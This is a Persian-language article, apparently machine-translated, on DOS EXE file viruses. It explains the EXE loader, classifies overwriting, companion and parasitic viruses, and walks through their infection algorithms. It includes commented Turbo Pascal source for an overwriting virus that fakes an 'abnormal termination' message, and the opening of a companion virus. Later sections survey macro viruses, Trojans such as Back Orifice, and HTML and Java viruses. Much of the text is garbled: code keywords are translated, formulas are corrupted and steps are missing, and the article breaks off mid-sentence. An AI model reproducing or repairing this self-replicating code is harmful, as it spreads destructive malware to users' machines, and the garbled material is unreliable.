این مقاله در مورد ویروس ها، عفونی کردن فایل های EXE. طبقه بندی از جمله ویروس ها، الگوریتم های کار آنها به طور مفصل مورد بحث قرار گرفته است، تفاوت بین آنها، مزایا و معایب.
ویروس ها- این ژیمناستیک خوبی برای ذهن است، اگرچه بسیاری از مردم به این فکر می کنند که چه چیزی بنویسند ویروسدر زبان سطح بالاخیلی سخت. این کاملا درست نیست. بنویسید زبان پاسکالبه راحتی، اگرچه اندازه کد به دست آمده حیرت انگیز است.
برای هر نوع ویروس هاارایه شده متون منبعبا توضیحات دقیق اطلاعات اولیه در مورد ساختار و اصول عملیاتی نیز ارائه شده است برنامه های EXE.
فایل های COM (برنامه های کوچکنوشته شده عمدتا در زبان اسمبلی) به آرامی اما مطمئناً منسوخ می شوند. آنها با مواردی جایگزین می شوند که در اندازه خود ترسناک هستند. EXE-"هیولا". ویروس هایی نیز ظاهر شده اند که می توانند عفونی کنند فایل های EXE.
ساختار و فرآیند بارگذاری یک برنامه EXE
بر خلاف برنامه های COM,برنامه های EXEممکن است از چندین بخش (کد، داده، پشته) تشکیل شده باشد. آنها می توانند بیش از 64 کیلوبایت اشغال کنند. فایل EXEدارای یک هدر است که هنگام بارگذاری استفاده می شود. هدر شامل یک بخش قالب بندی شده است که حاوی امضا و داده های مورد نیاز برای بارگذاری است. فایل EXEو جداول برای تنظیم آدرس ها ( جدول جابجایی). جدول شامل مقادیر در بخش قالب: offset است. پس از بارگیری برنامه در حافظه، آدرس قسمتی که برنامه از آن بارگیری شده است باید به افست های ماژول بار که با مقادیر جدول نشان داده شده است اضافه شود.
در آغاز برنامه های EXEلودر سیستم (با فراخوانی تابع DOS 4Bh) اقدامات زیر را انجام می دهد:
1. آدرس بخش ناحیه حافظه آزاد، اندازه را تعیین کنید
که برای میزبانی برنامه کافی است.
2. یک بلوک حافظه برای متغیرهای محیطی ایجاد و پر می شود.
3. یک بلوک حافظه برای PSP و برنامه ایجاد می شود (بخش YOOOO - PSP;
بخش + OOOYOOOOOO - برنامه).
مقادیر مربوطه در فیلدهای PSP وارد می شوند.
4. آدرس DTA روی PSP:0080h تنظیم شده است.
5. قسمت فرمت شده در ناحیه کار لودر خوانده می شود
سرتیتر فایل EXE.
6. طول ماژول بارگذاری با استفاده از فرمول محاسبه می شود:
Si7.e=((PageCnt*5i2)-(HdrSae*i6))-Pa!tP3ig.
7. افست ماژول بار در فایل برابر است با
8. آدرس بخش (START_SEG) برای بارگیری محاسبه می شود - معمولاً PSP+lOh است.
9. ماژول بوت در حافظه خوانده می شود (شروع از آدرس
START_SEG:0000).
10. برای هر ورودی جدول راه اندازی:
الف) کلمات I_OFF و I_SEG خوانده می شوند.
ب) RELC^SEG-START^SEG+LSEG محاسبه می شود.
ج) کلمه در آدرس RELO_SEG:I_OFF خوانده می شود.
د)START_SEG به کلمه خوانده شده اضافه می شود.
ه) نتیجه در همان آدرس ذخیره می شود (RELO_SEG:I_OFF).
11. حافظه برای برنامه مطابق با MaxMet اختصاص داده شده است
12. رجیسترها مقدار دهی اولیه می شوند، برنامه اجرا می شود:
ب) AX = نتیجه بررسی صحت شناسه های راننده مشخص شده در خط فرمان;
ج)SS°START_SEG+ReloSS، SP-ExeSP؛
د)CS=START_SEG+ReloCS، IP=ExeIP.
طبقه بندی ویروس های EXE
ویروس های EXEرا می توان به صورت مشروط به گروه هایی با استفاده از ویژگی های الگوریتم به عنوان نشانه ای برای تقسیم تقسیم کرد. ویروس هازیاد نوشتن) چنین ویروس هاقبلاً به یک نادر تبدیل شده اند. اشکال اصلی آنها این است که بیش از حد خشن هستند. برنامه های آلوده اجرا نمی شوند زیرا ویروسروی کد برنامه بدون ذخیره آن نوشته می شود. در آغاز ویروسبه دنبال قربانی (یا قربانیان) بعدی می گردد، فایل پیدا شده را برای ویرایش باز می کند و بدون ذخیره کد اصلی، بدنه آن را در ابتدای برنامه می نویسد. آلوده به اینها ویروس هابرنامه ها مشمول درمان نیستند.
ویروس های همراه
اینها ویروس هانام خود را به دلیل الگوریتم تولید مثل دریافت کردند:
برای هر فایل آلوده یک فایل ماهواره ای ایجاد می شود. بیایید نگاهی دقیق تر به دو نوع ویروس در این گروه بیندازیم:
ویروس ها نوع اول به شرح زیر تکثیر می شود. برای هر فرد مبتلا فایل EXEیک فایل با کد ویروس در همان دایرکتوری ایجاد می شود که نامی مشابه دارد فایل EXE، اما با پسوند COM. ویروسدر صورتی فعال می شود که هنگام شروع برنامه فقط نام فایل اجرایی در خط فرمان مشخص شده باشد. نکته این است که اگر پسوند فایل مشخص نشده باشد، DOSابتدا فایلی را در فهرست فعلی جستجو می کند نام داده شدهو گسترش COM. اگر فایل COMبا این نام یافت نشد، جستجو برای همین نام در حال انجام است فایل EXE. اگر پیدا نشد و فایل EXE، DOS سعی می کند شناسایی کند مالیات بر ارزش افزودهفایل (دسته ای). اگر هیچ فایل اجرایی در دایرکتوری فعلی با نام مشخص شدهجستجو در تمام دایرکتوری های قابل دسترسی توسط متغیر انجام می شود مسیر. به عبارت دیگر، زمانی که کاربر می خواهد برنامه ای را اجرا کند و فقط نام آن را در خط فرمان تایپ می کند (بیشتر همه این کار را انجام می دهند)، اولی کنترل می شود ویروسکه کد آن در است فایل COM. او به وجود آورد فایل COMبه یک یا چند فایل های EXE(گسترش می دهد) و سپس اجرا می کند فایل EXEبا نامی که در خط فرمان مشخص شده است. کاربر فکر می کند که فقط راه اندازی شده کار می کند برنامه EXE
ویروس ماهواره را خنثی کنید بسیار ساده - فقط حذف کنید
فایل COM.
ویروس هانوع دوم ظریف تر عمل می کند. نام فرد مبتلا
فایل EXEثابت می ماند و پسوند با برخی جایگزین می شود
غیر از اعدامی ( COM، EXE و BAT)، مثلا،
فایل می تواند پسوند را دریافت کند DAT(فایل داده) یا OVL(حرفه ای-
پوشش گرم). سپس در جای خود فایل EXEکپی شده است ویروسیکد هنگامی که چنین برنامه آلوده ای راه اندازی می شود، کنترل توسط آن به دست می آید ویروسیکد واقع در فایل EXE. با آلوده کردن یک یا چند فایل های EXEبه همین ترتیب ویروسبرمی گرداند فایل اصلی پسوند اجرایی(اما نه E HE، و COM، زیرا فایل EXEبا این نام توسط یک ویروس اشغال شده است)، پس از آن آن را اجرا می کند. پس از اتمام اجرای برنامه آلوده، فایل اجرایی آن به پسوند غیر قابل اجرا برگردانده می شود. ضد عفونی فایلآلوده شدن به این نوع ویروس ممکن است دشوار باشد اگر ویروس-Sputnik قسمتی یا کل بدنه فایل آلوده را رمزگذاری می کند و قبل از اجرا آن را رمزگشایی می کند.
ویروس ها، تعبیه شده در برنامه (Parasitic) ویروس هااز این نوع نامحسوس ترین هستند: کد آنها در برنامه آلوده نوشته می شود که ضروری است درمان را دشوار می کند فایل های الوده. بیایید روش های پیاده سازی را در نظر بگیریم ویروس های EXE در فایل EXE.
راه های آلوده کردن فایل های EXE
رایج ترین روش عفونت فایل های EXEمانند این: بدنه به انتهای پرونده اضافه می شود ویروس، و هدر تنظیم می شود (با حفظ نسخه اصلی) به طوری که هنگام راه اندازی فایل آلوده، کنترل دریافت می شود ویروس. به نظر عفونته فایل های COM، اما به جای تنظیم کد برای رفتن به ابتدای ویروس، آدرس واقعی نقطه راه اندازی برنامه اصلاح می شود. پس از اتمام کار، ویروس آدرس اصلی راه اندازی برنامه را از هدر ذخیره شده می گیرد، مقدار رجیستر DS یا ES (که هنگام شروع ویروس به دست می آید) را به جزء سگمنت خود اضافه می کند و کنترل را به آدرس دریافتی منتقل می کند.
روش بعدی - تزریق ویروس در ابتدای فایل با تغییر کد
برنامه ها. مکانیسم عفونت به شرح زیر است: بدن برنامه آلودهدر حافظه خوانده شود، در جای خود نوشته شود کد ویروس، و پس از آن - کد برنامه های آلودهس بنابراین، کد برنامه، همانطور که گفته شد، در فایل با طول کد ویروس "جابهجا میشود". از این رو نام روش - "روش تغییر" است. هنگام اجرای یک فایل آلوده ویروسیک یا چند فایل را آلوده می کند. پس از آن، کد برنامه را در حافظه می خواند و آن را در یک برنامه خاص می نویسد فایل موقتبا پسوند فایل اجرایی ( COM یا EXE) و سپس این فایل را اجرا می کند. پس از اتمام اجرای برنامه، فایل موقت حذف می شود. اگر در هنگام ایجاد ویروس از تکنیک های حفاظتی اضافی استفاده نشده باشد، درمان یک فایل آلوده بسیار ساده است - کافی است کد ویروس را در ابتدای فایل حذف کنید و برنامه دوباره فعال خواهد شد. عیب این روش این است که لازم است کل کد برنامه آلوده در حافظه خوانده شود (و نمونه هایی با اندازه بزرگتر از 1 مگابایت وجود دارد).
راه بعدی برای آلوده کردن فایل ها - روش انتقال - ظاهراً پیشرفته ترین از همه لیست شده است. ویروسبه صورت زیر تولید می شود: وقتی یک برنامه آلوده راه اندازی می شود، بدن ویروساز آن در حافظه بخوانید سپس جستجو برای یک برنامه غیر آلوده انجام می شود. آغاز آن، به اندازه طول بدن، در حافظه خوانده می شود ویروس. جسد در این مکان ثبت شده است ویروسشروع برنامه از حافظه به انتهای فایل اضافه می شود. از این رو نام روش - "روش انتقال" است. بعد از ویروسیک یا چند فایل را آلوده کرده است، شروع به اجرای برنامه ای می کند که از آن راه اندازی شده است. برای انجام این کار، ابتدا برنامه آلوده را که در انتهای فایل ذخیره شده است می خواند و آن را در ابتدای فایل می نویسد و عملکرد برنامه را بازیابی می کند. سپس ویروسکد شروع را از انتهای فایل حذف می کند و طول اولیه فایل را بازیابی می کند و برنامه را اجرا می کند. پس از پایان برنامه، ویروس دوباره کد خود را در ابتدای فایل می نویسد و ابتدای اصلی برنامه را به انتهای آن می نویسد. زوج آنتی ویروس ها، که کد آنها را از زمان راه اندازی یکپارچگی بررسی می کنند ویروساین برنامه دقیقاً همان کد قبلی را دارد.
ویروس ها، جایگزین کردن کد برنامه (زیاد نوشتن) همانطور که قبلا ذکر شد، این گونه ویروس هامدت زیادی است که مرده است گاه از این قبیل نیز وجود دارد ویروس هادر زبان ایجاد شده است مونتاژ کننده، اما بیشتر یک رقابت برای نوشتن کوچکترین است رونویسی ویروس. در حال حاضر کوچکترین شناخته شده است رونویسی ویروس هانوشته شده است یادآوری (گروه Death Virii Crew)و 22 بایت می گیرد.
الگوریتم نحوه عملکرد یک ویروس بازنویسی به شرح زیر است:
1. فایلی را که ویروس از آن کنترل دریافت کرده است باز کنید.
3. فایل را ببندید.
4. جستجو با ماسک برای یک فایل مناسب برای عفونت.
5. اگر فایل دیگری یافت نشد، به مرحله 11 بروید.
6. فایل پیدا شده را باز کنید.
7. بررسی کنید که آیا فایل یافت شده به این ویروس آلوده است یا خیر.
8. اگر فایل آلوده است، به مرحله 10 بروید.
9. کد ویروس را در ابتدای فایل بنویسید.
10. فایل را ببندید (در صورت تمایل می توانید از یک به همه فایل ها را آلوده کنید)
ماهیگیری در کاتالوگ یا روی دیسک).
11. برخی از پیام های خطا را بر روی صفحه نمایش دهید، به عنوان مثال "خاتمه برنامه غیرعادی" یا "حافظه کافی نیست" - به طوری که کاربر از شروع نشدن برنامه خیلی تعجب نکند.
12. برنامه را خاتمه دهید.
در زیر لیستی از برنامه هایی است که فایل ها را به این روش آلوده می کند.
(2048 دلار، 0، 0)
(از ماژولهای DOS و System استفاده میشود (ماژول System به طور خودکار در هر برنامه در هنگام کامپایل گنجانده میشود))
(نام ویروس)
VirName='درد';
(خط بررسی عفونت مجدد.
بلافاصله پس از کد به فایل آلوده اضافه می شود ویروس}
VirLabel: String='Pain!1;
(طول مجموعه حاصل فایل EXE}
نویسنده=’نازی کثیف/SGWW.’;
(تعداد فایل های آلوده در یک جلسه)
(آرایه برای تعیین اینکه آیا یک کپی وجود دارد ویروسدر فایل یافت شده)
Virlidentifier: Array of Char;
(متغیر فایل برای کار با فایل ها)
(یک متغیر فایل دیگر - اگرچه بدون آن قابل انجام است، اما واضح تر خواهد بود)
(برای نام فایل پیدا شده)
TargetFile:PathStr;
(بافر بدن ویروس)
VirBuf: آرایه [-I.VirLen] از Char;
(برای تاریخ/زمان فایل)
(شمار تعداد فایل های آلوده)
Dirlnfo:SearchRec;
LabelBuf: Array of Char;
(مقداردهی اولیه)
LabelBuf :=VirLabel;
LabelBuf:=VirLabel;
LabelBuf:=VirLabel،
LabelBuf:=VirLabel;
LabelBuf:=VirLabel;
(میزان شمارنده مقدار را بازنشانی کنید فایل های الوده}
(متغیر فایل VirBody را با نام برنامه ای که از آن شروع کرده ایم مرتبط می کنیم)
Assign(VirBody، ParamStr(O));
(باز کردن یک فایل با تغییر اندازه = 1 بایت)
بازنشانی (VirBody, 1);
(جسد را از روی پرونده خواندیم ویروسبه آرایه VirBuf)
BlockRead (VirBody VirBuf، VirLen)؛
(فایل را ببندید)
(جستجو برای قربانی)
روش FindTarget;
(اگر برنامه یافت شده قبلاً آلوده شده باشد، تابع True و اگر هنوز آلوده نشده باشد، False را برمیگرداند)
تابع VirusPresent: Boolean;
VirusPresent:=False;
(فایل یافت شده را باز کنید)
اختصاص دادن (هدف، فایل هدف)؛
بازنشانی (هدف، 1)؛
(به طول بدن حرکت می کنیم ویروساز ابتدای فایل)
جستجو (هدف، VirLen)؛
(ما 5 بایت می خوانیم - اگر فایل قبلاً آلوده شده باشد، یک برچسب وجود دارد ویروس}
BlockRead (Target, Virldentifier, 5)؛
If Virldentifier=Virl_abel سپس
(اگر علامتی وجود دارد، پس وجود دارد ویروس}
VirusPresent:=True;
(روش عفونت)
روش InfectFile;
(اگر اندازه فایل یافت شده کمتر از طول ویروس به اضافه 100 بایت است، از رویه خارج شوید)
اگر Sr.Size< VirLen+100 Then Exit;
اگر برنامه یافت شده هنوز آلوده نشده باشد، آن را آلوده می کنیم)
اگر ویروس وجود ندارد پس
(بیایید تاریخ و ساعت فایل را به خاطر بسپاریم. نیازی به یادآوری ویژگی ها نیست، زیرا جستجو در بین فایل هایی با ویژگی Archive انجام می شود و این ویژگی در هر صورت پس از ذخیره روی فایل قرار می گیرد)
(باز برای عفونت)
اختصاص دادن (هدف، فایل هدف)؛
بازنشانی (هدف، 1)؛
(بدن را ثبت می کند ویروستا ابتدای فایل)
BlockWrite (Target، VirBuf، VirLen)؛
(نشانگر موقعیت فعلی را به طول حرکت دهید ویروساز ابتدای فایل)
جستجو (هدف، VirLen)؛
(برچسب عفونت را وارد کنید)
BlockWrite (Target, LabelBuf, 5)؛
(تاریخ و ساعت فایل را تنظیم کنید)
SetFTime (هدف، زمان)؛
(بسته شدن)
( شمارنده را افزایش دهید فایل های الوده}
(شروع روش FindTarget)
(ما با استفاده از ماسک به دنبال فایل ها در دایرکتوری فعلی هستیم EXE
با صفات بایگانی}
FindFirstF.EXE’, Archive, Sr)؛
(تا زمانی که فایل هایی برای آلوده کردن وجود دارد)
در حالی که DosError=0 انجام دهید
اگر Sr.Name=”سپس خروج;
(ما نام فایل یافت شده را در متغیر TargetFile به خاطر می آوریم)
TargetFile:=Sr.Name;
(با روش عفونت تماس بگیرید)
(اگر فایل های InfCount آلوده شده اند، جستجو را کامل کنید)
اگر InfFiles > InfCount سپس خارج شوید.
(به دنبال فایل بعدیبا ماسک)
(بدنه اصلی)
(در حال انجام اولیه)
(ما به دنبال قربانیان می گردیم و آنها را آلوده می کنیم)
(پیام خطا را روی صفحه نمایش می دهیم)
WriteLn ("خاتمه غیرعادی برنامه.");
(این برای این است که کامپایلر ثابت های VirName و Author را در کد وارد کند، اما شرط به گونه ای تنظیم شده است که این خطوط هرگز روی صفحه نمایش داده نشوند)
WriteLn(VirName)؛
WriteLn (نویسنده)؛
ویروس های همراه
ویروس های ماهواره ایدر حال حاضر گسترده - نسبت همراه به انگلی ویروس هاتقریباً یک در دو. عفونت با روش ایجاد فایل COMمنظور از ماهواره این است که به "گربه بیگانه" دست نزنید ( برنامه EXE)، مال خودت را بساز" - فایل COMبا نام برنامه های EXE. الگوریتم برای این ویروسبسیار ساده است، زیرا نیازی به اقدامات غیر ضروری نیست (به عنوان مثال، ذخیره طول کامپایل فایل EXEبا کد ویروس، خواندن در بافر بدن ویروس، فایلی را اجرا کنید که از آن ویروسکنترل دریافت کرد). حتی نیازی به ذخیره یک برچسب برای تشخیص آلوده بودن فایل نیست.
عفونت با استفاده از پردازشگر فرمان انجام می شود:
1.اگر پارامترها در خط فرمان مشخص شده اند، آنها را در یک متغیر String برای انتقال به برنامه آلوده ذخیره کنید.
2. پیدا کردن فایل EXE-قربانی.
3. بررسی کنید که آیا مورد پیدا شده در دایرکتوری وجود دارد یا خیر فایل EXE فایل COMبا همان نام پرونده قربانی.
4. اگر چنین است فایل COMموجود است، فایل قبلاً آلوده شده است، بروید
به نقطه 6
5. با استفاده از پردازشگر فرمان، فایلی را که از آن کپی کنید
کنترل در فایلی با نام و پسوند قربانی دریافت می شود COM.
6. رویه سابقفایلی را با نام فایل شروع، اما با پسوند بارگیری و اجرا کنید EXE- یعنی یک برنامه آلوده را اجرا کنید.
7. کنترل را به DOS برگردانید.
لیست زیر فایل های آلوده به این را نشان می دهد
(2048 دلار، 0، 0)
(ماژول های DOS و System استفاده می شوند (ماژول سیستم به طور خودکار
در طول کامپایل به هر برنامه متصل می شود))
(نام ویروس)
VirName='Guesf;
نویسنده='نازی کثیف/SGWW. فقط 4 PVT!';
(تعداد مبتلا شدهبرای یک جلسه فایل های کاری)
(برای نام فایل پیدا شده)
TargetFile:PathStr;
یک ویروس کامپیوتری می تواند خراب شود، به عنوان مثال. تغییر نامناسب هر فایل روی دیسک های رایانه اما این ویروس می تواند برخی از انواع فایل ها را "آلوده" کند. این بدان معنی است که ویروس می تواند خود را به این فایل ها "تزریق" کند. آنها را طوری تغییر دهید که حاوی ویروسی باشند که تحت شرایط خاص شروع به کار کند. لازم به ذکر است که متون برنامه ها و نسخه های قدیمی اسناد (به اصطلاح نسخه های DOS)، فایل های اطلاعات پایگاه داده، جداول پردازنده های جدول(نسخه های DOS) و سایر فایل های مشابه را نمی توان توسط ویروس آلوده کرد، فقط می تواند آنها را خراب کند.
انواع فایل های زیر را می توان با ویروس "آلوده" کرد:
1) فایل های اجرایی
فایل های اجرایی، یعنی فایل هایی با پسوندهای نام COM و EXE و همچنین فایل های همپوشانی که هنگام اجرای برنامه های دیگر بارگذاری می شوند. ویروس هایی که فایل ها را آلوده می کنند، ویروس فایل نامیده می شوند. ویروس در فایل های اجرایی آلوده کار خود را با راه اندازی برنامه ای که در آن قرار دارد آغاز می کند. خطرناک ترین آن ها هستند ویروس های فایل، که پس از راه اندازی آنها در حافظه باقی می مانند. این ویروسها میتوانند فایلها را آلوده کرده و تا دفعه بعد که رایانه خود را مجدداً راهاندازی میکنید باعث آسیب شوند. و اگر هر برنامهای را که از فایل AUTOEXEC.BAT یا CONFIG.SYS راهاندازی شده است آلوده کنند، حتی زمانی که از فایل راهاندازی مجدد میکنید هارد دیسکویروس دوباره شروع به کار خواهد کرد.
2) لودر سیستم عامل و مستر بوت ضبط سختدیسک
ویروس هایی که این نواحی را آلوده می کنند، ویروس بوت نامیده می شوند. چنین ویروسی زمانی کار خود را شروع می کند که سیستم عامل بوت می شود و ساکن می شود، یعنی. به طور دائم در حافظه کامپیوتر ذخیره می شود. مکانیسم توزیع عفونت سوابق بوت فلاپی دیسک های وارد شده به کامپیوتر است. به طور معمول، چنین ویروس هایی از دو بخش تشکیل شده اند سوابق بوتدارند اندازه کوچکو قرار دادن کل برنامه ویروس در آنها دشوار است. بخشی از ویروس که در آنها قرار نمی گیرد در قسمت دیگری از دیسک قرار دارد، به عنوان مثال، در انتهای فهرست اصلی دیسک یا در یک خوشه در ناحیه داده دیسک (معمولاً چنین کلاستر معیوب اعلام می شود تا برنامه ویروس هنگام نوشتن داده ها روی دیسک بازنویسی نشود.
3) درایورهای دستگاه:
درایورهای دستگاه، یعنی فایل های مشخص شده در بند DEVICE فایل CONFIG.SYS. ویروس موجود در آنها با هر بار دسترسی به دستگاه مربوطه کار خود را آغاز می کند. ویروس هایی که درایورهای دستگاه را آلوده می کنند بسیار نادر هستند زیرا درایورها به ندرت از یک رایانه به رایانه دیگر بازنویسی می شوند. همین امر در مورد فایل های سیستم DOS (MSDOS.SYS و IO.SYS) صدق می کند - آلودگی آنها نیز از نظر تئوری امکان پذیر است، اما برای انتشار ویروس ها بی اثر است.
4) ویروس های اینترنتی
که در اخیرابا افزایش تعداد کاربران ظاهر شد. در اینجا به برخی از انواع این ویروس ها اشاره می کنیم:
4.1 فایل های پیوست شده. یک موقعیت معمولی را در نظر بگیرید: دریافت کردید پست الکترونیک، پیوستی که یک سند مایکروسافت WORD است. البته، شما می خواهید به سرعت با محتویات فایل آشنا شوید، خوشبختانه هنگام استفاده از مدرن ترین برنامه های پستیبرای این کار کافیست روی نام این فایل کلیک کنید.
و این یک اشتباه است!
اگر فایل حاوی یک ویروس ماکرو (و ویروس هایی از این نوع است که Microsoft WORD، Microsoft EXCEL و تعدادی از اسناد دیگر را آلوده می کند. سیستم های محبوبمدیریت اسناد، اخیراً بسیار گسترده شده است)، بلافاصله سیستم شما را آلوده می کند. پس با سند پیوست چه باید کرد؟ چند ثانیه اضافی صرف کنید: آن را در دیسک ذخیره کنید، آن را با یک برنامه آنتی ویروس بررسی کنید آخرین نسخهو فقط پس از آن، اگر ویروسی وجود نداشت، آن را باز کنید. راه حل های دیگری نیز وجود دارد. به عنوان مثال، برنامه های آنتی ویروس وجود دارد که کار می کنند بررسی خودکارایمیل دریافتی اگر از برنامه نگهبان استفاده می کنید، پس هنگام باز کردن یک فایل آلوده، قطعاً یک هشدار دریافت خواهید کرد (به طور دقیق تر، به سادگی اجازه باز کردن فایل آلوده را نخواهید داشت). از این گذشته ، نگهبان کاملاً بی تفاوت است ، چه سند را مستقیماً باز کنید یا "از زیر" برنامه ایمیل.
4.2 اسب تروا. معروف تروجان هاتوزیع شده از طریق اینترنت اساساً ابزارهایی برای مدیریت از راه دورکامپیوتر. به زبان ساده، از طریق چنین برنامه ای، یک مهاجم می تواند بدون اطلاع و مشارکت شما، به رایانه شما دسترسی پیدا کند و عملیات مختلفی را بر روی آن (تقریباً هر کدام) انجام دهد.
یک نماینده معمولی از نوع توصیف شده، برنامه BASK ORIFICE (BO) است. BO یک سیستم مدیریت از راه دور است که به کاربر اجازه می دهد کامپیوترها را با استفاده از یک کنسول معمولی یا پوسته گرافیکی. "که در شبکه محلییا از طریق اینترنت VO در اختیار کاربر قرار می دهد امکانات بیشتربر کامپیوتر WINDOWS از راه دوراین متن از یک آگهی تبلیغاتی در یکی از صفحات وب هکرها است. البته امکان مدیریت از راه دور رایانه شما یک خطر جدی است، اما نه به آن بزرگی که به نظر می رسد. در نگاه اول. کاربران معمولیزمان زیادی را در اینترنت صرف نکنید (کیفیت خطوط تلفنبه این امر کمک می کند)، و چه کاری می توان در رایانه خود انجام داد که از دیدگاه یک هکر بسیار "جالب" است؟ به نظر می رسد که ممکن است، اما شما نیازی به مدیریت چیزی ندارید. نکته قابل توجه برای یک هکر رمز عبوری است که شما برای کار با سرور ارائه دهنده استفاده می کنید. با به دست آوردن رمز عبور، یک هکر به راحتی می تواند تمام پول شما را هدر دهد. خوشبختانه تروجان هایی که می دانند چگونه اجرا کنند توابع مشخص شده، تعداد کمی از آنها و همه آنها با موفقیت توسط برنامه های آنتی ویروس شناسایی می شوند.
4.3 ویروس های HTMLویروس ها از این نوعنادر هستند، بنابراین اطلاعات در مورد آنها به جای عملی، دارای علاقه "آکادمیک" است. نکته این است: در واقع زبان HTML، که برای علامت گذاری اسناد ابرمتن استفاده می شود، البته هیچ ویروسی نمی توان نوشت. اما برای ایجاد صفحات پویا، سازماندهی تعامل کاربر و سایر اقدامات، از درج نرم افزار (اسکریپت) در اسناد HTML استفاده می شود. ویروس های شناخته شده HTML از اسکریپت های نوشته شده در آن استفاده می کنند زبان بصریپایه ای. با کمک آنها، یافتن فایل های HTM و HTML در ماشین محلی، و در آنها ثبت می شود. گاهی اوقات چنین ویروس هایی به نوعی خود را نشان می دهند (مثلاً پیام ها را نمایش می دهند). گسترش کم ویروس های این نوع (و همچنین تعداد کم آنها) با این واقعیت تسهیل می شود که وقتی تنظیمات استاندارداجرای مرورگرهای "خطرناک" (این شامل مواردی می شود که در آنها به فایل ها دسترسی پیدا می شود کامپیوتر محلی) اسکریپت ها ممنوع است. اسکریپت های "امنیتی" معمولی نمی توانند دستکاری های توصیف شده را انجام دهند.
4.4 ویروس های جاوا. در حال حاضر دو ویروس شناخته شده در جاوا نوشته شده است. آنها عملا هیچ خطری ندارند. اجازه دهید ماهیت را به طور خلاصه توضیح دهیم: ماژول های اجرایی برنامه های نوشته شده در JAVA (فایل های کلاس) در دو نوع هستند: برنامه ها و اپلت ها. برنامه ها تحت کنترل مترجم اجرا می شوند و تقریباً هستند برنامه های منظم(تقریباً به این دلیل که هنوز محدودیت هایی دارند، مثلاً در زمینه کار با حافظه). اپلتها، بر خلاف برنامهها، میتوانند تحت کنترل مرورگرها اجرا شوند، اما محدودیتهای امنیتی بسیار شدیدتری دارند: بهویژه اپلتها تقریباً به هیچ دسترسی ندارند. سیستم فایلکامپیوتر (بر خلاف مورد با اسکریپت ها، غیرفعال کنید این محدودیتدر مرورگر غیرممکن است)، بنابراین، ویروس های JAVA فقط می توانند به عنوان برنامه های کاربردی طراحی شوند و برای اکثریت قریب به اتفاق کاربران تهدیدی ایجاد نمی کنند. به عنوان یک قاعده، هر نوع خاص از ویروس تنها می تواند یک یا دو نوع فایل را آلوده کند. رایج ترین ویروس ها آنهایی هستند که فایل های اجرایی را آلوده می کنند. برخی از ویروس ها فقط فایل های EXE را آلوده می کنند، برخی فقط فایل های COM را آلوده می کنند و بیشتر هر دو را آلوده می کنند. دومین ویروس رایج، ویروس های بوت هستند. برخی از ویروس ها هم فایل ها و هم قسمت های بوت دیسک را آلوده می کنند. ویروس هایی که درایورهای دستگاه را آلوده می کنند بسیار نادر هستند. به طور معمول، چنین ویروس هایی می توانند فایل های اجرایی را آلوده کنند.
ماکرو ویروس ها ابزارهای بالقوه ناخواسته ای هستند که به ریززبان هایی نوشته شده اند که به صورت گرافیکی و جاسازی شده اند. سیستم های متنیدر حال پردازش. چه فایل هایی توسط ویروس های ماکرو آلوده می شوند؟ پاسخ واضح است. رایج ترین نسخه ها برای برنامه ها مایکروسافت اکسل، ورد و آفیس 97. این ویروس ها بسیار رایج هستند و ایجاد آنها به آسانی پوست اندازی گلابی است. به همین دلیل است که هنگام دانلود اسناد از اینترنت باید نهایت دقت و احتیاط را به خرج دهید. اکثر کاربران آنها را دست کم می گیرند و در نتیجه مرتکب اشتباه بزرگی می شوند.
کامپیوتر چگونه آلوده می شود؟
پس از اینکه تصمیم گرفتیم ویروس های ماکرو چیست، بیایید بفهمیم که چگونه آنها به سیستم نفوذ کرده و کامپیوتر را آلوده می کنند. یک روش ساده تولید مثل آنها به شما امکان می دهد در کوتاه ترین زمان ممکن آلوده شوید. بیشترین مقداراشیاء. به لطف قابلیتهای زبانهای ماکرو، هنگام بستن یا باز کردن یک سند آلوده، به برنامههای مورد دسترسی نفوذ میکنند.
یعنی هنگام استفاده از یک ویرایشگر گرافیکی، ویروس های ماکرو هر چیزی که به آن متصل است را آلوده می کند. علاوه بر این، برخی از آنها همیشه هنگام ارسال پیامک فعال هستند ویرایشگر گرافیکیکار کنید یا تا زمانی که کامپیوتر کاملاً خاموش شود.
اصل کارشان چیست؟
عمل آنها طبق اصل زیر انجام می شود: هنگام کار با اسناد، مایکروسافت ورددستورات مختلف صادر شده به زبان ماکرو را اجرا می کند. اول از همه، برنامه به قالب اصلی نفوذ می کند که از طریق آن تمام فایل های این فرمت باز می شوند. در این حالت، ویروس کد خود را در ماکروهایی کپی می کند که دسترسی به پارامترهای اصلی را فراهم می کند. هنگام خروج از برنامه، فایل به طور خودکار به صورت نقطه ای ذخیره می شود (برای ایجاد اسناد جدید استفاده می شود). پس از آن وارد ماکروهای استاندارد می شود و سعی می کند دستورات ارسال شده به فایل های دیگر را رهگیری کند و آنها را نیز آلوده کند.
عفونت در موارد زیر رخ می دهد:
- اگر یک ماکرو خودکار در ویروس وجود داشته باشد (هنگامی که برنامه خاموش یا شروع شود به طور خودکار انجام می شود).
- این ویروس دارای یک ماکرو اساسی سیستم است (اغلب با آیتم های منو همراه است).
- هنگامی که کلیدها یا ترکیبات خاصی را فشار می دهید به طور خودکار فعال می شود.
- تنها زمانی که راه اندازی شود تکثیر می شود.
این گونه ویروس ها معمولاً همه فایل های ایجاد شده و مرتبط با برنامه های یک زبان ماکرو را آلوده می کنند.
چه ضرری می کنند؟
ویروس های ماکرو را همانطور که هستند دست کم نگیرید ویروس های تمام عیارو آسیب قابل توجهی به رایانه ها وارد کند. آنها میتوانند به راحتی هر چیزی که شامل اطلاعات شخصی است را حذف، کپی یا ویرایش کنند. علاوه بر این، آنها همچنین می توانند اطلاعات را با استفاده از ایمیل به افراد دیگر منتقل کنند.
ابزارهای قدرتمندتر به طور کلی می توانند دیسک های سخت را فرمت کرده و عملکرد کل رایانه شخصی را کنترل کنند. به همین دلیل است که این عقیده که این نوع ویروسهای رایانهای منحصراً برای گرافیکها و رایانهها خطرناک هستند ویرایشگرهای متن، اشتباه پس از همه، ابزارهایی مانند Word و Excel با تعدادی دیگر کار می کنند که در این مورد نیز در معرض خطر هستند.
شناسایی فایل آلوده
اغلب، شناسایی فایلهای آلوده به ویروسهای ماکرو و حساس به نفوذ آنها اصلاً دشوار نیست. از این گذشته ، آنها کاملاً متفاوت از سایر برنامه های کاربردی با همان فرمت عمل می کنند.
خطر را می توان با علائم زیر تشخیص داد:
